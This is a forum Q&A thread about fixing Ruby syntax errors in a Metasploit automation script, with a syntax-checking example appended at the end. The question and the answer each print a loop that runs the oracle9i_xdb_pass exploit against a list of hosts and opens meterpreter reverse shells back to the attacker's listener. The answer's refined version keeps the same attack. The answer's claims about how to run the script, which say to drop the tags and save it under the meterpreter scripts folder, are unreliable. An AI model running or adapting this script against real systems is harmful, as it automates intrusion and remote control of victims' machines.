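How to fix syntax errors when running a Ruby script in Metasploit

Time: 2017-04-10 18:45:36

Tags: ruby metasploit

I have been trying to automate Metasploit, but without success.

I want a text file of hosts to go through the same exploit ("oracle9i_xdb_pass") with the same options.

Here is my code: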

 <ruby>
    lports = ["80","443","445"]
    index = 0;
    targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
    targets.each do |target|
        run_single("use exploit/windows/http/oracle9i_xdb_pass")
        run_single("set LHOST 192.168.2.7")
        run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
        run_single("set LPORT #{lports[index]}")
        run_single("set RHOST #{target}")
        run_single("set ExitOnSession false")
        run_single("exploit -j -z")
        index = index + 1
   end
 </ruby>

The problem is that when I run this with ruby xploit.rb, I get this error:

ruby exploit.rb
exploit.rb:1: syntax error, unexpected '<'
<ruby>
 ^
exploit.rb:15: syntax error, unexpected '<', expecting end-of-input
</ruby>

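1 answer:

Answer 0: (score: 1)

I don't know what your idea was in using <ruby> tags in your code, but they are not a thing in Ruby. Removing them gives you a valid Ruby script: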

lports = ["80","443","445"]
index = 0;
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.each do |target|
    run_single("use exploit/windows/http/oracle9i_xdb_pass")
    run_single("set LHOST 192.168.2.7")
    run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
    run_single("set LPORT #{lports[index]}")
    run_single("set RHOST #{target}")
    run_single("set ExitOnSession false")
    run_single("exploit -j -z")
    index = index + 1
end

While that should run, a neat Ruby trick is to do this:

lports = ["80","443","445"]
targets = ["192.168.1.1","192.168.1.2","192.168.1.3"]
targets.zip(lports).each do |target, lport|
    run_single("use exploit/windows/http/oracle9i_xdb_pass")
    run_single("set LHOST 192.168.2.7")
    run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
    run_single("set LPORT #{lport}")
    run_single("set RHOST #{target}")
    run_single("set ExitOnSession false")
    run_single("exploit -j -z")
end

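Use zip to merge the arrays together so that you can iterate over them at the same time, with no need for an index variable; then all you need to do is run the script.

I don't think ruby exploit.rb will work, because you are using special Metasploit functionality. You need to open a meterpreter shell and run: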

> run exploit

For this, your exploit needs to be saved in the correct folder. On Linux, that would be:

/usr/share/metasploit-framework/scripts/meterpreter/exploit.rb
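
The parser errors quoted in the question can be reproduced without executing anything. The following is an added example, not code from the original post: it separates the `<ruby>` tag lines from the body and compiles each version with Ruby's own parser. The sample file is constructed, and the names `syntax_error_for`, `split_tags` and `check` are hypothetical.

```ruby
# Constructed sample: the question's file layout, with the body cut down to one call.
SAMPLE = <<~'RC'
  <ruby>
  targets = ["192.168.1.1", "192.168.1.2"]
  targets.each do |target|
    run_single("set RHOST #{target}")
  end
  </ruby>
RC

# A line that holds nothing but an opening or closing ruby tag.
TAG_LINE = /\A\s*<\/?ruby>\s*\z/

# Returns nil when +source+ parses as Ruby, otherwise the first line of the
# parser's error message. The source is compiled only, never executed.
def syntax_error_for(source)
  RubyVM::InstructionSequence.compile(source)
  nil
rescue SyntaxError => e
  e.message.lines.first.to_s.strip
end

# Splits a file into its tag lines and the Ruby body left once they are removed.
def split_tags(text)
  tags, body = text.lines.partition { |line| line.match?(TAG_LINE) }
  [tags.map(&:strip), body.join]
end

# Checks the file as written and again with the tag lines removed.
def check(text)
  tags, body = split_tags(text)
  { tags: tags, raw_error: syntax_error_for(text), body_error: syntax_error_for(body) }
end

if __FILE__ == $PROGRAM_NAME
  result = check(SAMPLE)
  puts "tag lines found: #{result[:tags].inspect}"
  puts "as written:      #{result[:raw_error] || 'parses'}"
  puts "tags removed:    #{result[:body_error] || 'parses'}"
end
```

A clean parse only shows that the body is valid Ruby syntax; `run_single` is still undefined outside Metasploit.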